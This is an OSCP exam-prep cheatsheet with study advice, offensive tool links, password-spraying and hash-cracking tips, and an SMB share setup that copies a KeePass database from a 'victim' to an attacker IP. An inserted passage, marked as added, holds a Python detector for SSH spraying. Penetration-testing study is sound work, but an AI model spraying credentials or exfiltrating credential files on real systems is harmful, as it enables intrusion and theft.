v.0.1

First rule: no cheatsheet is as great as the one you forge with your own hands. Rewrite the PDF in your own words!

**This is the key to success.**

And do as many labs as you can.

Having conquered the OSCP with a flawless victory (maxed out score), I've honed a razor-sharp methodology that cuts through the noise. This is not your run-of-the-mill cheatsheet bloated with trivialities. It's a lean, lethal collection of the absolute essentials — the pure bone meat of the craft.

Let's kick this off by saying the current version of the course (2023) is rock solid. With the labs, it'll gear you up well for the exam. I'm pumped to hit the next learning trail.

## Core Tenets:
- **Precision Over Complexity**:
  - The core of success lies in a solid methodology.
  - However, remember to keep it straightforward: this is a basic exam, after all.
- **Don't Panic**: Stay cool under fire. Panic clouds judgement and leads to errors. Embrace the grind and remember, you've trained for this!
- **Scheduled Breaks**: Adhere to pre-planned breaks to rest your mind and body. It's a marathon, not a sprint.
- **Recharge**: Step outside, take a walk with your dog; a short nap can reboot your mind, enhancing your problem-solving abilities upon return.
- **Report:** Be ready to write it; simplify the method to the max, that's all. It can be Word, but not the one from OffSec, they have fucked up formatting.

## Initial Foothold: Where to Begin

- Acquired the target's hostname? Enlist it in `/etc/hosts`. Still in the dark? Engage in rigorous enumeration!
- Feel something is missing? Use a different tool/flag or... revert!
- Don't jump ahead; check every corner like a pro.
- If you don't have a fully functional shell, try to make one; some exploits depend on it.
## Digital Armory: Websites at Your Fingertips

Now, I'll provide you with a list of web resources you should have at your fingertips, along with insights on how to utilize them proficiently.

You know the best way to check when you see something unusual?
HIT UP GOOGLE AND HACKTRICKS!

**google:** bla bla hacktricks

**google:** bla bla vulnerability

No nonsense here. I've listed only the rare and not-so-obvious commands. In the exam or in the field, you'll encounter the unknown. No need to cram the whole web onto this cheatsheet.

https://www.revshells.com/

https://wadcoms.github.io/

https://lolbas-project.github.io/#

https://gtfobins.github.io/

https://gchq.github.io/CyberChef/

https://hashcat.net/wiki/doku.php?id=example_hashes

https://github.com/swisskyrepo/PayloadsAllTheThings

https://crackstation.net/

The sequence doesn't matter; master them. For me, this was my toolkit.

## Cyber Arsenal: Tools of The Trade

I ain't spoon-feeding you descriptions, work these tools out yourself. Most ain't in the course, but they're gold. If they show up in the course, you better damn well sit up. These are the kinds of tools I'd have killed to know from the get-go.

##### AutoRecon
https://github.com/Tib3rius/AutoRecon
##### FeroxBuster
https://github.com/epi052/feroxbuster
##### enum4linux-ng
https://github.com/cddmp/enum4linux-ng
But remember, young Padawan: a different version on Kali there is, and different results it yields. Equally intriguing both may be; worth checking with both, it is!
##### CrackMapExec
https://github.com/mpgn/CrackMapExec
And an awesome cheatsheet: https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/
##### PrivescCheck
https://github.com/itm4n/PrivescCheck/tree/master
##### SweetPotato
https://github.com/CCob/SweetPotato
##### JuicyPotatoNG
https://github.com/antonioCoco/JuicyPotatoNG
##### GodPotato
https://github.com/BeichenDream/GodPotato
##### pspy
https://github.com/DominicBreuker/pspy
##### A single-click, single-file web server for Windows
https://github.com/faustinoaq/sswws

And now, trumpets blaring, the essentials you need to grasp to catapult your cyber existence to a realm of ease:
##### ligolo-ng
https://github.com/Nicocha30/ligolo-ng

## SPRAY 'EM ALL: The "I'm stuck" Crusade

Stumbled upon a new user? **Throw it into `USERS.TXT`.**

Caught wind of a new password? Or something that smells like one? **Toss it into `PASSWORDS.TXT`.**

Now, unleash the spray! **SPRAY! SPRAY! SPRAY!**

Whether it's FTP, SSH, CME, SMB, Kerberos, admin consoles, or any credential-hungry beast, **feed 'em all.**
Default creds? Dumb creds? **Throw 'em into the fray.**
Encountered alien software? Or a familiar one? **Hunt down its default credentials.**

New user on the block? Try the ol' **username:password** trick. `user:user`, `admin:admin`, you know the drill.
Password cracking playing hard to get? **Spin the username as the password.**
Hashcat playing coy? Tried the rules? Now serenade it with **John**, or take **Crackstation** out for a spin.
John being difficult? **Invite Hashcat and Crackstation to the dance.**
Crackstation not cutting it? **Hashcat and John might just do the tango.**

With the clock ticking away, I hammered down the final privilege escalation just an hour before the curtain call.
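Spraying like the section above describes is loud on the target side, so here is the defender's view of it, as an added example that is not part of the original cheatsheet: a small detector run over constructed sshd-style log lines that flags a source IP trying many distinct usernames inside a short window (the spray signature) while leaving repeated failures against a single user alone. The sample lines, the thresholds and the function names are all my own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style sample lines (not from the original page): one source
# tries five different users within seconds, another hammers a single user.
SAMPLE_LOG = """\
Mar 10 09:00:01 host sshd[101]: Failed password for invalid user alice from 10.0.0.5 port 50001 ssh2
Mar 10 09:00:03 host sshd[102]: Failed password for invalid user bob from 10.0.0.5 port 50002 ssh2
Mar 10 09:00:05 host sshd[103]: Failed password for carol from 10.0.0.5 port 50003 ssh2
Mar 10 09:00:07 host sshd[104]: Failed password for dave from 10.0.0.5 port 50004 ssh2
Mar 10 09:00:09 host sshd[105]: Failed password for erin from 10.0.0.5 port 50005 ssh2
Mar 10 09:01:00 host sshd[106]: Failed password for frank from 10.0.0.9 port 50006 ssh2
Mar 10 09:01:30 host sshd[107]: Failed password for frank from 10.0.0.9 port 50007 ssh2
Mar 10 09:02:00 host sshd[108]: Failed password for frank from 10.0.0.9 port 50008 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_failures(text, year=2024):
    """Yield (timestamp, user, source_ip) for every failed-login line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_spray(text, min_users=4, window=timedelta(minutes=5)):
    """Return {source_ip: sorted usernames} for each source that tried at least
    min_users distinct usernames inside one sliding window. Many users from one
    source is the spray signature; many tries on one user is plain brute force."""
    attempts = defaultdict(list)
    for ts, user, ip in parse_failures(text):
        attempts[ip].append((ts, user))
    hits = {}
    for ip, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits

if __name__ == "__main__":
    for ip, users in detect_spray(SAMPLE_LOG).items():
        print(f"possible password spray from {ip}: {', '.join(users)}")
```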
And you know what? It's all thanks to keeping a cool head. Being damn calm in the chaos is not just good—it's golden!

## Weak Spots and Hints:

Now I'll unveil some tactical strikes against the soft points of various things.

Did you know you can do something like this?

```bash
# RDP in with clipboard sharing, dynamic resolution, and the local
# /usr/share/windows-resources directory redirected into the session as a drive named "share"
xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
```

Do you want to compile files correctly?

Use this: https://github.com/X0RW3LL/XenSpawn

Do you know how to transfer files with **SMB**?

Attacker:
```bash
# serve /tmp as an SMB share called "sharename"; -smb2support is needed for modern Windows clients
sudo impacket-smbserver -smb2support sharename /tmp
```

Victim:
```shell
net use \\192.168.00.000\sharename
copy .\Database.kdbx \\192.168.00.000\sharename
```

-----

- I'll keep this updated.
- I hammered out this "cheatsheet" reflecting on what I would have wanted by my side as I kicked off my OSCP adventure.
- Got suggestions? Hit me up at [raphostrovsky@pm.me](mailto:raphostrovsky@pm.me).